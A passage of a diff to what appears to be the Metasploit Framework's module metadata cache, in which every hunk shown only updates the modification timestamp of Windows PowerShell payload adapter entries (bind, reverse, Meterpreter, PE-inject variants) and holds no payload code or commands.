-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp",
@@ -173047,7 +173370,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_rc4",
@@ -173085,7 +173408,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/bind_tcp_uuid",
@@ -173121,7 +173444,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/find_tag",
@@ -173159,7 +173482,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ipv6_tcp",
@@ -173196,7 +173519,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_nonx_tcp",
@@ -173233,7 +173556,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_ord_tcp",
@@ -173271,7 +173594,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp",
@@ -173309,7 +173632,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_allports",
@@ -173348,7 +173671,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_dns",
@@ -173388,7 +173711,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4",
@@ -173428,7 +173751,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_rc4_dns",
@@ -173466,7 +173789,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupdllinject/reverse_tcp_uuid",
@@ -173505,7 +173828,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_ipknock_tcp",
@@ -173544,7 +173867,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_hidden_tcp",
@@ -173582,7 +173905,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp",
@@ -173621,7 +173944,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_ipv6_tcp_uuid",
@@ -173658,7 +173981,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_named_pipe",
@@ -173695,7 +174018,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_nonx_tcp",
@@ -173733,7 +174056,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp",
@@ -173773,7 +174096,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_rc4",
@@ -173811,7 +174134,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/bind_tcp_uuid",
@@ -173847,7 +174170,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/find_tag",
@@ -173885,7 +174208,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ipv6_tcp",
@@ -173922,7 +174245,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_nonx_tcp",
@@ -173959,7 +174282,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_ord_tcp",
@@ -173997,7 +174320,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp",
@@ -174035,7 +174358,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_allports",
@@ -174074,7 +174397,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_dns",
@@ -174114,7 +174437,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4",
@@ -174154,7 +174477,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_rc4_dns",
@@ -174192,7 +174515,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/patchupmeterpreter/reverse_tcp_uuid",
@@ -174231,7 +174554,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_hidden_ipknock_tcp",
@@ -174270,7 +174593,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_hidden_tcp",
@@ -174308,7 +174631,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp",
@@ -174347,7 +174670,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_ipv6_tcp_uuid",
@@ -174383,7 +174706,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_named_pipe",
@@ -174419,7 +174742,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_nonx_tcp",
@@ -174457,7 +174780,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp",
@@ -174497,7 +174820,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp_rc4",
@@ -174534,7 +174857,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/bind_tcp_uuid",
@@ -174570,7 +174893,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/find_tag",
@@ -174608,7 +174931,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_ipv6_tcp",
@@ -174644,7 +174967,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_named_pipe",
@@ -174680,7 +175003,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_nonx_tcp",
@@ -174716,7 +175039,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp",
@@ -174754,7 +175077,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp",
@@ -174792,7 +175115,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports",
@@ -174831,7 +175154,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns",
@@ -174871,7 +175194,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4",
@@ -174911,7 +175234,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns",
@@ -174948,7 +175271,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid",
@@ -174983,7 +175306,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/pingback_bind_tcp",
@@ -175018,7 +175341,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/pingback_reverse_tcp",
@@ -175056,7 +175379,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_bind_tcp",
@@ -175094,7 +175417,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_reverse_tcp",
@@ -175132,7 +175455,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl",
@@ -175171,7 +175494,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp",
@@ -175210,7 +175533,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp",
@@ -175248,7 +175571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp",
@@ -175287,7 +175610,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid",
@@ -175324,7 +175647,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_named_pipe",
@@ -175361,7 +175684,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp",
@@ -175399,7 +175722,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp",
@@ -175439,7 +175762,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4",
@@ -175477,7 +175800,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid",
@@ -175514,7 +175837,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/find_tag",
@@ -175552,7 +175875,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp",
@@ -175589,7 +175912,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp",
@@ -175625,7 +175948,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp",
@@ -175663,7 +175986,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp",
@@ -175701,7 +176024,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports",
@@ -175740,7 +176063,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns",
@@ -175780,7 +176103,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4",
@@ -175820,7 +176143,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns",
@@ -175858,7 +176181,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid",
@@ -175895,7 +176218,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell/reverse_udp",
@@ -175931,7 +176254,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_bind_tcp",
@@ -175966,7 +176289,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw",
@@ -176003,7 +176326,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp",
@@ -176039,7 +176362,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/shell_reverse_tcp",
@@ -176074,7 +176397,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
